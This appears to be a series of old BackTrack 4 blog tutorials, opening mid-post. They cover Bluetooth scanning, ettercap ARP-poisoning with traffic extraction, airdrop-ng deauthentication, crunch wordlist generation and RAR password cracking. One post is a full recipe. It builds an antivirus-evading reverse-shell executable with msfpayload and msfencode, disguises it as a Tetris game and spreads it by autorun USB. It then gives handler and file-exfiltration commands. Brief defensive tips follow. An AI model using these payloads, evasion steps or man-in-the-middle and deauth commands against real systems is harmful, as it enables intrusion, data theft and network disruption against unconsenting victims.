2. Export results to log
3. Quit

cd /pentest/bluetooth/bluescan/

./bluescan

Btscanner

-------------

Btscanner uses all available bluetooth interfaces for scanning.
It opens an GUI and works similar to the oldschool Kismet, listing found bluetooth devices with the possibility to show further information on the devices when selected.
i    <-- starts an inquiry scan
Enter   <-- gives further info on the device selected
a     <-- aborts the scan
Q    <-- Quits the program
Results for the devices found are logged automatically with a directory created per bdaddr found.
For scanning for devices, I would say that so far as I have seen, this tool is the one to use.
edit
I have come to the conclusion that I am not fond of the way btscanner ;
> Does not enable the choosing of individual interface adapters.
> Logs all the information in separate folders, it makes sense in view of the information included, but it makes it harder to quickly view a list of bdaddr's, Names, Class etc.once programme quits.

btscanner

Further info after selecting the found device;
(q to return to main menu)

ghettotooth

---------------

ghettotooth simply lists the bdaddr's and names of the devices found.
A log is made each time ghettotooth is started.

cd /pentest/bluetooth/ghettotooth/

perl ghettotooth.pl -h

perl ghettotooth.pl hci0

T-bear

---------

A straightforward bluetooth device locator with options to log the results.
Whichever interface is entered to use, the screen shows hci0 as being in use after a few seconds
which is a bit confusing.
edit
Well after having played a bit more with them, I have decided that I like tbear the best for quick scans.
The reason is that you can choose which interface adapter to use (even though it doesnt correctly mention that on screen) and it is easy to view a quick list of what was found from the logs after quitting the programme. Plus it looks pretty ;)

cd /pentest/bluetooth/tbear/

./tbear -h

./tbear -i hci0 -l log

From what I have read, Tbear did originally come with a load of other tools (http://www.secguru.com/link/tbear_bluetooth_environment_auditing), but in BT4 there are just two other tools with tbear;
tanya & tbsearch

tanya is a DoS tool for bluetooth, however haven't yet played enough with it to get it to work.
I would love to think that the author had a wife / GF called Tanya whose constant rattling reminded him of a DoS..

tbsearch is a tool to search for hidden bluetooth devices by checking bluetooth addresses and able to use multiple threads (multiple bluetooth interfaces)
So for instance if you know a device should be in the area and you have the bdaddr or a possible range you can search for it and tbsearch will find it, even if it is in hidden mode, and continue searching for others.
Its not a fast process however..

cd /pentest/bluetooth/tbear/

./tbsearch

./tbsearch -b 6C:9B:02:FF:97:2F hci0

(bluetooth on mobile set to 'hidden')

This process can be sped up a bit using multiple dongles, below I have a total of 4 devices checking it all out with a starting point 7 digits before the bdaddr, but as you can see it came back with a false positive..
(30 instead of 2f)
This happened more or less consistently when using multiple interfaces, checking for individual bdaddr's seems to work better when using a single interface with tbsearch.

./tbsearch -b 6C:9B:02:FF:97:29 hci0 hci1 hci2 hci3

redfang

----------

fang checks for 'hidden' bluetooth devices by scanning a range of bluetooth addresses similar to the above tbsearch but somewhat more refined and expanded.
fang appears to work better than tbsearch in detecting hidden devices using multuiple interfaces.

cd /pentest/bluetooth/redfang/

./fang -h

The below example is only testing the last 2 digits of the bdaddr of my test phone (set to hidden) using 4 bluetooth interfaces as above with tbsearch.
./fang -r 6C9B02FF9700-6C9B02FF973F -n 4

A word of warning, bluetooth and WiFi both use part of the 2.4 GHz band .. carrying out this attack with this many dongles basically caused my wireless network to suffer considerably..

This is the easy stuff, now there is a whole lot more to get my head around, but hopefully the motivation will continue to flow as I have to say, for the moment bluetooth feels a bit like ;

Some reference material ;

http://www.backtrack-linux.org/forums/backtrack-howtos/2583-dr_greens-bluesnarfer-bluebugger-guides-old-fourm.html
http://www.sans.edu/resources/securitylab/bluetooth.php

more to be added..please leave a comment if you have a link to helpful info.

Creating an executable with Metasploit and gaining access to target PC

2010-05-31T15:48:00.286+02:00

My goal for this project was to create a reverse_tcp payload and have this executed on the target pc, byassing the installed antivirus and giving full access to the target pc.

This of course based on being on the network and having a valid IP address.

Target PC

-----------

- Windows XP Home SP3 Fully Patched
(also tested on Windows XP Profressional SP 3 fully patched)
- AntiVirus fully upto date
- Running Windows Firewall only

I more or less got where I wanted to be, but had trouble getting any meterpreter payloads passed AntiVirus.
EDIT
-------
I did finally manage to get meterpreter past the AV, it is indeed a matter of trying different variations/combinations of various encoders.

Steps taken were as follows ;
> Create an exe file with msfpayload that will create a reverse_tcp connection which will try to connect back to
    the 'attackers' machine.
> Use various encoding methods on the exe with msfencode to make the file less obvious to AV

> Use some social engineering to get the target to run my executable.

Although AntiVirus now mostly pick up the metasploit payloads, the methods and encoding are evolving and it is interesting to see the methods involved.
I have experienced that the windows/meterpreter/reverse_tcp payloads are more frequently detected than the windows/shell/reverse_tcp payload.

Different combinations of encoding may help, a bit of trial and error required !

PAYLOAD
-------------
windows/shell/reverse_tcp    the payload
LHOST=192.168.1.105     the local IP the payload will try to connect back to
LPORT=5632      the local port the connection will be listening on
R                                          the command to tell msfpayload to output as raw data

ENCODING
./msfencode -h for options
./msfencode -l to list available encoders
----------------------------------------
-e to specify the encoder to use
-c to specify the number of times to encode the data
-t to specify the format (in this example raw and for the final step exe)
-x to specify the win32 exe template to use

I am using the backslash \ so I can continue the code on another line for clarity's sake.
I have copied notepad.exe (from C:\WINDOWS\system32\) to the framework3 directory.

cd /pentest/exploits/framework3/

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.105 LPORT=5632 R | \

./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
./msfencode -e x86/countdown -c 2 -t raw | \

./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \

./msfencode -x notepad.exe -t exe -e x86/call4_dword_xor -c 2 -o payload.exe

ls -la | grep exe

In combination with the -x command in msfencode, you can also add the -k option which will run the template exe in a new thread.
(So if included in the above example, would also open notepad.exe on the victim's pc when the payload is run).
This does however change the size of the executable from the original legitimate executable and may give AV more cause to flag the exe file as suspicious.
In this case I have opted to not use the -k option to keep the file sizes identical.

So how did we do concerning the antivirus detection ?

If you upload the payload to for instance VirusTotal.com for verification, you have an excellent chance that the file signatures will be forwarded to various AV vendors and updated accordingly in as quick as a day or two.. rendering that particular file / encoding useless..

To test this case, I simply ensured that virus definitions were updated on the system and ran the AV scans locally.

So far so good.. !

Now a bit of Social Engineering based on the inherent curiosity and playfulness of mankind ..
to get the executable run on the target pc.

There are several ways to do this, in this case my method was as follows ;
> Renamed the payload.exe to tetris.exe
> Binding the tetris.exe with an exe which runs a tetris game, named the new exe Tetris.exe
   Using IExpress (readily installed on Win XP) to package the 2 executables.
> Replaced the icon of the tetris.exe (with payload) with the original icon extracted from the original executable.
   Used IcoFX for both the extraction and replacing of the icons.
> Renamed a USB flash drive to TETRIS, saved the tetris.exe to root of the usb drive.
> Created an autorun file to open up the Tetris.exe on insertion and saved to root of the usb drive
   (only works if autorun enabled of course)

Something similar can also be done with a U3 USB flash drive;
> Using Universal Customizer create a custom ISO image (ISOCreate.cmd) containing exe and autorun.inf file.
> Run the Universal Customizer to have the standard U3 ISO replaced with the custom ISO.
Now when placed in a PC with autorun enabled, there is no interaction needed to start the exe file.
(So could simply place the payload in the iso section and be done with it, but where's the fun in that ?!)

Now we start listening for possible incoming connections on the 'attacker' pc, hand out the USB to possible target and wait.

To start listening for incoming connections you can either use the msfconsole or msfcli,
I will use msfcli ;

cd /pentest/exploits/framework3/

./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp \
LHOST=192.168.1.100 LPORT=5632 E

When the USB is plugged in it will open the usual menu (if autorun enabled) asking if you would like to
open the folder or open the file.

With the U3 USB flashdrive method, it will open the Tetris.exe file directly (if autorun enabled).

Wait for target to play the game, sit back and wait for them to close the game so the payload will be executed.
(The options in IExpress need one program to be run before the other)

When that happens, you should get a shell and it is basically Game Over for the victim.

Listing all drives ;

fsutil fsinfo drives

Check what type of drive it is;
fsutil fsinfo drivetype D:
Just to get the info of a drive;

fsutil fsinfo volumeinfo D:\

Of course there are a myriad of options to use to check information on the drives.

Using the usual to get drive names / labels and list of fiolders / files

dir C:\

dir D:\

dir E:\

For a more targeted listing, go to directory of interest and list based on filetype; doc / zip / jpg / avi / etc etc
dir /s/p/b \*.avi

To enable downloading and uploading in the shell you can use TFTPD.
Start TFTPD on your backtrack machine
(K Menu -- Services -- TFTP -- Start TFTPD)

To 'download' from the victim machine ;
tftp -i 192.168.1.105 put filename

To 'upload' to the victim machine
tftp -i 192.168.1.105 get filename (from backtrack directory /tmp/)

So how to protect against such intrusions ?

======================================

Turn autorun off on your windows system

The below link gives information on how to do this on multiple systems.
Disable the Autorun functionality in Windows
Of course it goes without saying that you should always be careful of what you plug into and run on your system, but truth be told, we all actually have done this at one time and one doesnt always have a virtual machine handy to test the process out on first..

Ensure AntiVirus deifinitions are uptodate

Although in this example the exe bypassed the AV, it will not do so for long, its only a matter of time before
AV picks up on the signature, so always make sure your AV definitions are upto date.

Run a firewall that monitors outgoing connections in addition to incoming connections.

Having a firewall installed that monitors outgoing connections would have prevented the reverse_tcp session from getting out without any notifications.
Windows firewall only monitors incoming connections, so having the reverse_tcp connecting out from the victim system does not raise any alarms.

ZoneAlarm Firewall for instance will popup and advise that ***.exe is trying to connect to ***.
That should set a few alarms off with the user.

Linkage on the information and the tools used ;

========================================

Video by IronGeek on the packaging of executables with IExpress.
http://www.irongeek.com/i.php?page=videos/binders-iexpress-trojans

IcoFX Homepage
http://icofx.ro/

Univeral Customizer information
http://www.hak5.org/w/index.php/Universal_U3_LaunchPad_Hacker

A video showing the process as described above but with some slight changes

as regarding a meterpreter session and using a different exe as template.

http://blip.tv/file/3741812

or

http://vimeo.com/12484065

or

http://www.youtube.com/watch?v=C0px_dczD6I

Creating wordlists with crunch v2.4

2010-04-02T20:37:00.117+02:00

Edit 12-06-2011

crunch v3.0 is now included in the BT repositories,
v3.0 has many big fixes and additional functionality, some items/switches have however been altered.
Therefor, this post is superceded by ;

http://adaywithtape.blogspot.com/2011/05/creating-wordlists-with-crunch-v30.html

crunch is an invaluable tool for quickly (well.. depending on the size of wordlist..) creating bruteforce wordlists.

The latest version released recently is v2.4 and compared with the release currently installed with backtrack 4 (v2.0) comes with some very cool additions.
The version of crunch in backtrack 4 repositories is expected to be updated within a few days to crunch v2.4
Edit dd 03-07-2010 -- Crunch 2.4 is finally included in latest updates !

crunch is one of the first tools that come to mind when needing to create a bruteforce wordlist and since it has been modified so heavily since I first stumbled on it with backtrack 3, I figured it was time for a full and comprehensive testing, to be able get to grips with all the latest goodness in it !

The default path for crunch v2.4 in backtrack 4 is;
/pentest/passwords/crunch/

crunch's output is printed to screen when no -o option is given to write to file, so you can easily check to see if it is doing what you wanted.
It can also be piped through to additional programs such as aircrack or cowpatty.

general usage is ;

./crunch

[minlength] [maxlength] [charset] -o wordlist.txt

NOTE:
It is close to impossible to stop crunch to still show the command given, so the below pics are images of part of the output from the given command..

BASIC USAGE & CHARACTER SETS

==============================

If no character set is defined, crunch defaults to using lower case alpha only ;

./crunch 4 4

The charset can be entered manually in the command line ;

./crunch 4 4 ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789

The output can also be inverted using the -i option.

So as opposed to ;

./crunch 4 4 ABCDEFG

Using the -i option will invert the direction when making the wordlist from left-to-right to right-to-left ;

./crunch 4 4 ABCDEFG -i

Or a charset can be chosen from the charset.lst file which saves on the typing (and typoes..) when dealing with normal ranges of letters, numbers and symbols.
charset.lst (included in the crunch installation package) ;

./crunch 4 4 -f charset.lst mixalpha-numeric

The output using charsets can also be inverted using the -i option.

CREATING CUSTOM PATTERNS

==========================

The great thing about crunch is the ability to create patterns with the -t option, this function has been greatly improved with crunch v2.3 and now offers many more possibilities than before.

To create a wordlist with a prefix of 'dog' followed by the characters in a chosen charset ;

./crunch 6 6 -f charset.lst lalpha -t dog@@@

Or having 'dog' appended to the end of the chosen charset ;

./crunch 6 6 -f charset.lst lalpha -t @@@dog

Or to have 'dog' bang in the middle ;

./crunch 7 7 -f charset.lst lalpha -t @@dog@@

In this latest version of crunch it is also possible to create a pattern, specifying where you want
characters / numbers / symbols
which can really be handy in reducing the overall size of the wordlist if you know there is a certain pattern involved;

./crunch 6 6 -f charset.lst mixalpha -t @dog%^

In the above example ;
@ --> will read and print from the specified character set only.
% --> will print numeric values only.
^ --> will print symbols/special characters only, including space.

This feature opens up easier and powerful options for creating lists with certain patterns of special characters or numbers;

For a 4 character wordlist containing only special characters.

./crunch 4 4 -t ^^^^

For a 4 character wordlist containing numbers and special characters in the sequence; 1$1$

./crunch 4 4 -t %^%^

For a 4 letter wordlist containing characters and numbers in the sequence; a1a1

./crunch 4 4 -t @%@%

Note that if no character set is defined, crunch defaults to lower case alpha character set when using @

For a 4 letter wordlist containing characters from a character set and special characters in the sequence A$A$

./crunch 4 4 -f charset.lst mixalpha-numeric-space -t @^@^

Character sets to use for the -t option can also be specified ;

To use ;
ABCD as characters
1234 as numeric values
@#$% as symbols

./crunch 6 6 -t @dog%^ ABCD 1234 @#$%

./crunch 7 7 -t ^@dog%@ ABCD 1234 @#$%

Note that when specifying character sets like this for use with the -t option, the sequence of the character set specification must be;
alpha -- numeric -- symbols

Some special characters need escaping, to do this make sure a backslash \ is placed before the character to escape, so for instance using the above example, but requiring a symbol charset of ;

!()&

./crunch 6 6 -t @dog%^ ABCD 1234 \!\&

STRING PERMUTATIONS

====================

Crunch also now has the possibility to generate permutations instead of combinations on either strings of characters or words.

To generate permutations on characters, specify with the -p option, fun for anagrams !
(although crunch then ignores min and max length, you do still need to enter them)

./crunch 1 1 -p dog

To generate permutations on words/strings, specify same with the -m option,
(again, although the min and max length is ignored, it does need to be entered)
The -m option does not (yet) have the capability to read from file, this however, has been placed in the author's to-do list.

./crunch 1 1 -m cat dog pig

OUTPUT OPTIONS

===============

Resulting output from crunch can also be split in various sizes, based on either line count or on actual size and can also be compressed.

To split the output based on line count, use the -c option combined with -o START ;

./crunch 4 4 -f charset.lst lalpha -o START -c 100000
The above will result in files being created containing no more than 100000 words (lines).

Output files can be split into files of a certain maximum size using the -b option combined with -o START.
The size definition can be; kb, mb, gb or kib, mib, gib
kb, mb, and gb are based on the power of 10 (i.e. 1KB = 1000 bytes)
kib, mib, and gib are based on the power of 2 (i.e. 1KB = 1024 bytes).

Creating files no larger than 500kb :

./crunch 4 4 -f charset.lst lalpha -o START -b 500kb

Creating files no larger than 1mb :

./crunch 4 4 -f charset.lst lalpha -o START -b 1mb

Output files can also be compressed with the -z option, using either bzip, gzip or lzma

./crunch 4 4 -f charset.lst lalpha -o wordlist -z gzip

A resume function is also built-in with the -r option;
After cancelling the build of the wordlist, the exact same syntax must be used again followed with the -r option ;

./crunch 4 4 -f charset.lst mixalpha -o wordlist.txt

./crunch 4 4 -f charset.lst mixalpha -o wordlist.txt -r

There are many options and it truly is a great tool.

Thanks to bofh28 for reading my ramblings and thanks for this awesome tool !

The latest build can be downloaded at ;

http://sourceforge.net/projects/crunch-wordlist/

network captures revisited

2010-03-11T00:57:00.060+01:00

My goals were simple;

After having connected to my network, to capture all packets in a format that I can analyse later with the tools of my choice;
To view activity on my network 'live'.

Finally, after failing miserably trying to accomplish what was so easy in my mind..enter Ettercap..
saving my day (and a couple of nights' sleep).

A simple step has kept me busy for ages.. sjeesh..what a douche..can't believe I've never looked into it !
After some major browsing, reading and video viewing, I like it.
There is a lot of information out there on the various uses of Ettercap and it is obviously a very powerful tool.

So, to get back to my goal, to achieve it I used the below tools;
Done on Backtrack 4.

ettercap

foremost

tcpxtract (can be installed from the backtrack repos)

tcpreplay

urlsnarf/driftnet --> dsniff suite

After having connected to my network and having obtained IP address, time to fire up ettercap and get a list of hosts on the network;

ettercap -Tq -i wlan0 //

'h' for inline help
'l/L' to see the hosts

'q/Q' to quit Ettercap

I will choose to capture traffic from just a single client by routing all that client's traffic through ettercap (man in the middle attack) using arp-poisoning and writing this to a pcap file by using the -w option ;

ettercap -Tq -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -w dump

If I wanted to capture all traffic from all clients, then the syntax would be;

ettercap -Tq -i wlan0 -M arp:remote /192.168.1.1/ // -w dump

(all hosts slowed things down a bit)

Anyway, I let it rip focussed on 1 host and browsed happily away on the victim pc.

After stopping ettercap the file 'dump' was ready for use.

EXTRACTING FILES FROM CAPTURE FILE

==================================

DRIFTNET

http://www.ex-parrot.com/~chris/driftnet/
extracts images, audi and mpeg video from TCP streams

--------------------------------------------------------------------

I touched on this one in a previous post Analyzing/Monitoring network captures with dsniff but as it is still a valid tool, why not touch on it again.
As far as I can see the tool hasnt been updated since 2001, but it still has its uses, in my case however, it did sometimes stop responding and need restarting.

Driftnet does not read from files, and so we need to replay the dump file through the loopback interface and have driftnet extract the files from that;
For driftnet to work properly, you have to replay slowly, there is no point in including the -t option (topspeed) or multiplying the replay speed with -x.
So best to simply replay at capture speed without any options, you'll have to see which works best for you.

tcpreplay -i lo dump

In another console window;

driftnet -i lo

This will open up a seperate driftnet window in which the extracted images will be shown ;

If you dont want to have the images printed to the screen straight away then they can be saved to a temporary directory of your choosing (directory 'output' for example);
! Note that the files will be deleted when driftnet is stopped !

mkdir output

driftnet -i lo -a -d output/

I have had much less succes with driftnet than I have had with tcpxtract based on a capture over time.
driftnet seems to 'conk out' for me after a while, perhaps an issue with my network card / drivers. Cant be sure.
I do seem to be getting slightly better results when using my WUSB54GC Linksys usb adapter than when using the internal card (Atheros) on my Samsung N110.

FOREMOST

http://foremost.sourceforge.net/
recovers files from image files & drives

-----------------------------------------------

Foremost is a program to recover files from a number of image file types, drives and can also handle pcap files.
The version installed with backtrack4 is 1.5.4 whereas the latest one on sourceforge is 1.5.7
Not sure whether the latest version performs better, but am only using the stock install on backtrack for the time being.
Foremost's configuration file can be edited to include more filetypes, however the way to correctly do so escapes me at this time.
Regrettably there is very little information on how to correctly edit the config file.

foremost -h

foremost -i dump
ls
cd output/ && ls
cd jpg/ && ls

Foremost automatically creates an output directory named 'output', if no other directory is specified with the -o option.
(if specifying an output folder, that folder needs to be empty prior starting foremost)

Thumbnail view of part of what foremost was able to extract from the dump file;

I really like the audit report and the folders per type that foremost creates, a lot of data seems to get corrupted though.
This probably due to my igorance on how best to use the tool rather than the tool not working right I would guess..

TCPXTRACT

http://tcpxtract.sourceforge.net/
extracts files from network traffic

-----------------------------------------

tcpxtract is not included in backtrack, but simple to install as it is in the backtrack repositories;

apt-get update

apt-get install tcpxtract

tcpxtract is a tool for extracting files from network traffic, either direct from interface or from network capture file. It has not been updated since 2005 as far as I can see.
tcpxtract uses the same kind of configuration file as foremost does with 26 fileformats predefined for extraction.
As with foremost the configuration can be edited to include more fileformats, again, there seems to be precious little information on how to correctly do that.

First delete all the info in the previously used output directory to start with a clean slate;

rm -r output/*

tcpxtract

To extract from the dump file;

tcpxtract -f dump -o output/

tcpxtract puts everyhing unsorted in the output folder and does not have a nice audit report like foremost.
The results for the jpeg recovery however are much better than with foremost, it takes a little longer, but obviously does a better job with it;

I wasnt able to open a lot of the files that were extracted from the dump file by foremost & tcpxtract (neither seemed to like .png or .tif ..), but learning and hopefully may get slightly more adept as things progress !
(please leave a comment if you have tweaks / notes on how to improve on this !)

The great part of foremost & tcpxtract is that they are able to extract so many different filetypes from a pcap file / over the wire.

I will definitely be trying to get them working more to my liking as if I can get them to do what they should be able to do, they will be definite keepers and have a lot more uses than just fun with pics.

URLSNARF

http://monkey.org/~dugsong/dsniff/
sniffs HTTP requests

--------------------------------------------

I also touched on this one in a previous post Analyzing/Monitoring network captures with dsniff but again its worth looking at again as I was having trouble with Ettercap's remote_browser plugin.

urlsnarf can read from both interface or pcap file, to read from file ;

urlsnarf -p dump

If you were capturing from a couple of clients you could even focus this on a single client and write to a file for easier viewing with a slight addition ;

urlsnarf -p dump | grep 192.168.1.102 > client102.txt

nano client102.txt

VIEWING DATA 'LIVE'

==================

If you wanted to view the network traffic live, then there is no need to write to a dump file (although handy for retrospective checking).
You could simply leave out the write option from the ettercap command as follows;

ETTERCAP
-------------

for 1 host;

ettercap -Tq -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/

or for all hosts on network;

ettercap -Tq -i wlan0 -M arp:remote /192.168.1.1/ //

Then open up a couple of consoles and get viewing !

TCPXTRACT

---------------

tcpxtract -d wlan0 -o output/

DRIFTNET

-------------

driftnet -i wlan0

or to save the extracted files to a folder;
driftnet -i wlan0 -a -d output/

URLSNARF

--------------

urlsnarf -i wlan0

or to single out a certain host;

urlsnarf -i wlan0 | grep 192.168.1.102

At the end of the day, the most interesting tool worked with was Ettercap.. I will be digging into this and possibly posting soon on it.

Otherwise it has to be said that file carving (extracting files by means of checking file headers & footers and then 'carving' out the blocks inbetween) is awesome.. hope I can get to grips with this more.

Would appreciate comments on how to improve results with foremost / tcpxtract !

Video on the above can be found at ;

http://blip.tv/file/3340820
or
http://www.youtube.com/watch?v=SNWnSUjOKuo
or

http://vimeo.com/10142955

Testing airdrop-ng in BackTrack 4

2010-03-01T15:17:00.029+01:00

WARNING !

This tool can cause major disruptions to wireless networks / connectivity.

Be careful when writing the droprules and make sure it is only used on networks on which you are authorized to test it.

Airdrop-ng is described as being a 'rule-based Deauth(entication) tool'.

Airdrop is now available through the standard Backtrack repositories, can install with ;

apt-get update

apt-get install airdrop-ng

Different from other deauthentication tools, Airdrop provides a means to either allow or deny clients to the same access point at the same time, as well as other nifty functions such as allowing or denying access based on hardware type (hardware name or OUI).

This allowance or denial is based on rules which are entered in a text file read by the application.

The way it works is fairly staightforward, first airodump needs to be started, configured to write out to a .csv file.
Then airdrop is started, linking to the csv file and pointing to a rules configuration file where the drop rules are entered.

So the main thing is to figure out what you want to achieve with this tool running, prepare the file with drop rules accordingly and then let it rip !

First things first, start up airodump and configure to write to a .csv file ;

airmon-ng

airmon-ng start wlan0

airodump-ng mon0 -w test --output-format csv

Now to create a file with the Airdrop drop rules.
The standard format is;

a(allow)/bssid mac(or 'any')|client mac(or 'any')
or
d(deny)/bssid mac(or 'any')|client mac(or 'any')

In the written examples I am using 00-11-22-33-44-55 as AP mac and 55-44-33-22-11-00 as Client mac.
This for simplicity's sake.
Some of the actual picture examples show different macs addresses as these are taken from an actual test run requiring actual connections.

To start off, I will first create a simple file with a 'deny all' rule for a specific AP ;

echo '#Deny rules' > rules && echo 'd/00-11-22-33-44-55|any' >> rules

This rule will deny all clients access to the AP with mac address 00:11:22:33:44:55.
(Can also enter MAC addresses in the standard format; 00:11:22:33:44:55)

So now time to run Airdrop ;
(You can also include the -p option to disable the use of Pysco, gets rid of the 'Not Found' message ..)
[Depending on how it was installed, the below commands likely need to be started with ./airdrop-ng]

cd /pentest/wireless/airdrop-ng/

airdrop-ng -i mon0 -t ~/test-01.csv -r ~/rules

You can also include the -b option for some more detail (Rule debugging);

airdrop-ng -i mon0 -t ~/test-01.csv -r ~/rules -b

Now to edit the rules file to allow a client to access ;
As rules are run in a cascading order (from top to bottom) note that the Allow rules should be placed above the Deny rule ;

nano rules

#Allow rule

a/00-11-22-33-44-55|55-44-33-22-11-00

#Deny rule

d/00-11-22-33-44-55|any

With the above when running airdrop, all clients except 55-44-33-22-11-00 will be denied access to AP in question.
(Similar to an access point's mac-filtering approach)

There is no real need to include "#Allow rule" and the "#Deny rule", its just for clarity's sake.

Another nice function is the ability to Allow or Deny access to certain hardware based on OUI codes or (some) hardware names.
The OUI list can be updated in airdrop as follows (of course need to be online);

airdrop-ng -u

The OUI list can be found @ /pentest/wireless/airdrop-ng/support/oui.txt

I have only tested this using names on my network with Linksys and Intel equipment.

For instance, you can create a rule to deny all clients access to a Linksys router (WRT54G was tested) as follows ;

nano rules

#Deny rule

d/Linksys|any

The airdrop-ng result ;

airdrop-ng -i mon0 -t ~/test-01.csv -r ~/rules -b

Or you can create a rule to deny linksys adapters from accessing a certain AP ;

nano rules

#Deny rule

d/00-11-22-33-44-55|Linksys

The airdrop-ng result ;

airdrop-ng -i mon0 -t ~/test-01.csv -r ~/rules -b

Each time Airdrop finishes sending packets it re-parses the airodump csv file for changes as well as the rules file, this means that the rules file can be updated even while Airdrop is running.

NOTE
-------
Following a post on the BT4 forums, have found that airdrop does not like multiple allow rules.
After some further testing have found that multiple Deny rules seem to be OK.
But if more than 1 Allow rule, airdrop seems to simply ignore any allow rule after the 1st one.

In most cases what I noted was that with a connection already in place (connection with WUSB54GC adapter), the connection to the AP was not so much terminated, as rather activity was denied.
So on Windows received the message that "this connection has limited or no connectivity" and needed to restart the adapter to regain normal functionality.
edit
----
In further tests when running for a prolonged session it actually did kick the adapter off completely.

When first starting airdrop with a droprule in place Denying the client access and then trying to connect, there was only a continuous effort to get an IP address.
When then stopping airdrop, same message noted on "this connection has limited or no connectivity" and again needed to restart the adapter to regain normal functionality.

All in all, an interesting tool, with several interesting (and mischievous..) uses..

Video on the above ;

http://blip.tv/file/3292804
or
http://vimeo.com/9876579
or
http://www.youtube.com/watch?v=Wml82Q22bSY

RAR password cracking with cRARk

2010-02-25T20:24:00.020+01:00

cRARk is a .rar archive password cracker, but unlike rarcrack, can be customised to a far greater extent to allow partial passwords, wordlists, complementing wordlists with characters and more.
Also this programme is CUDA enabled which allows for a vast increase in testing speed.
This of course only if you have a capable graphics card. (http://www.nvidia.com/object/cuda_gpus.html)

cRARk is not installed by default on BT4 Final, a shame really as it is more versatile than rarcrack in my opinion. To install it though is a piece of cake ;

apt-get install crark

! During the install, the program tried to install the CUDA dependacies as well, in order for this to work properly you will need to exit 'X'. To do this press Ctrl + Del + Backspace to get back into Command Line only.
So seems best way to install is to get online, then quit X with Ctrl + Del + Backspace, and then run the apt-get install from the command line interface.

The machine I installed it onto does not have any CUDA capabilities, so this post will only go through some of the functions of cRARk without testing the CUDA improvements on cracking speed.
I may later try to do a full HDD install on my desktop to see if I can get my 8800GTS to work.

So after installing cRARk, lets fire it up through either the menu;

Start/Dragon --> Backtrack --> Privilage Escalation --> Password Attacks --> OfflineAttacks --> Crark

or command line ;

cd /pentest/passwords/crark/

Lets check out the files the readme's and what general options are advised;

./crark

BRUTEFORCE ATTACKS

================

To start off we need to create the password.def file. To do this simply copy either the english.def file or the crackme.def file to password.def ;

cp crackme.def password.def

Then to modify the password.def file to reflect the options we want to use.

Here I will be working with simple password protected files stored on my flashdrive (mounted on /media/8GB/)

Testing password protected test100.rar file with password 100 ;

nano password.def

Under the double hash enter the testing methods desired, in this case as only numbers ;

[$1] *

Save and exit

As my system cannot use CUDA I will disable it with the -c command when testing.

./crark -c /media/8GB/test100.rar

For checking password protected testabc.rar file with lowercase letters only ;

nano password.def

[$a] *

Save and exit.

./crark -c /media/8GB/testabc.rar

For checking a password protected test-ABC.rar with uppercase characters only ;

nano password.def

[$A] *

Save and exit

./crark -c /media/8GB/test-ABC.rar

To check all of the above on password protected testaB1.rar ;

nano password.def

[$a $A $1] *

Save and exit

./crark -c /media/8GB/testaB1.rar

!! It is important to note that cRARk will start checking based on the same sequence as the characters are entered in the definition file.

So in the above example entering the character information in the definition file as $1 $a $A would take a lot longer to find the password then if using $a $A $1 .

The end result will be the same, cRARk will find the password, but the time needed for checking will be severely affected.

(I thought I had messed up somewhere earlier on when I changed character sequence in definition file and it took longer than previous attempts).

To go all out and also include special characters ;

nano password.def

[$a $A $1 $!] *

Save and exit.

To test the password.def file and see whether the commands are going to work OK, the programme can test run the definitions using the -v option ;

./crark -c -v /media/8GB/test100.rar

This wont actually start the cracking process, but will print the characters on screen so you can check whether its doing what you want it to.

To specify the number of characters, the options -l & -g can be used.
So to specify a minimum of 3 characters and a maximum of 5 characters;

./crark -c -l3 -g5 /media/8GB/testabc.rar

The bruteforce attempts resulted in an average of around 60 pass/sec on my netbook and around 160 pass/sec on my desktop (windows version of cRARk).
With CUDA this will be greatly enhanced, but have to see if/when I can get that going.

WORDLIST/DICTIONARY ATTACKS

======================

cRARk also has the option to check passwords from a wordlist file.
To do this the password.def file needs to be adjusted to specify the location of the wordlist with $w, in this case I have copied a small english wordlist called english.dic into cRARk's directory.
(You can of course also specify an alternative location where the wordlist is)

Then we need to specify that cRARk will use a wordlist in password.def ;

nano password.def

$w = "english.dic"

Save and exit.

./crark -c /media/8GB/testAmsterdam.rar

The dictionary attacks averaged around 20 pass/sec on my netbook and I understand that there is no CUDA support for the dictionary attacks..
So having a focussed wordlist is a must !

To allow an easier choice of options, it is also possible to prepare some definition files and then specify these with the -p option.
For instance you can prepare a .def file which will use a wordlist file as follows and then keep there for future use ;

cp password.def wordlist.def

Then to specify to use the newly created wordlist.def file, the -p option is included ;

./crark -c -pwordlist.def /media/8GB/testAmsterdam.rar

There are a huge number of options to play with when it comes to the wordlist usage, extra options can be included to capitalize / invert / mashup / add numbers etc etc etc

I may update the post to show some of these options on a test wordlist.

It will be interesting to see how far I can get with the CUDA side of things, however that would mean a full HDD install on the desktop (doesnt work in VMware).

ADVANCED DICTIONARY OPTIONS

Following some queries in the comments I got to checking how the wordlist and the wordlist
manipulations work.
It truly is fantastically (and terrifyingly) customizable..

If for instance you have a list of words and you know that the password is a combination
of a couple of these words, then you can tell crark to do that in the .def file as follows;
For 2 words from the wordlist in succession;

wordlist.def
$w = "wordlist.txt"
##
$w $w

For 3 words from the wordlist in succession;

wordlist.def
$w = "wordlist.txt"
##
$w $w $w

If you have 2 wordlists and you know that the password will be a combination of
words of the 2 lists (only 1 way, so words from 2nd list appended to words from 1st list for instance)
then you can identify the 2nd wordlist with the $u function ;

wordlist.def
$u = "wordlist1.txt"
$w = "wordlist2.txt"
##
$u $w

So in the above all words from wordlist2.txt will be suffixed/appended to each word in wordlist1.

And of course any number of combinations of the above can be made.

In the below example ;
wordlist.def
$w = "test1.txt"
$u = "test2.txt"
##
$u$w$u

Author's Helpfile & Linkage ;
http://www.crark.net/cRARk.html

Video on the above ;

http://blip.tv/file/3275276
or
http://www.youtube.com/watch?v=viYdoZiCYaA

Cracking password protected archive files with rarcrack

2009-11-06T15:17:00.009+01:00

There are a large number of password cracking (or to word it in a nice fashion, password recovery) programs available to crack passwords of any number of file type.

Here I will be looking at cracking password protected archive files with rarcrack which is included in the back|track 4 distro.

First lets navigate to rarcrack in back|track, see the help file and which files are located in the rarcrack directory.

cd /pentest/passwords/rarcrack

./rarcrack --help

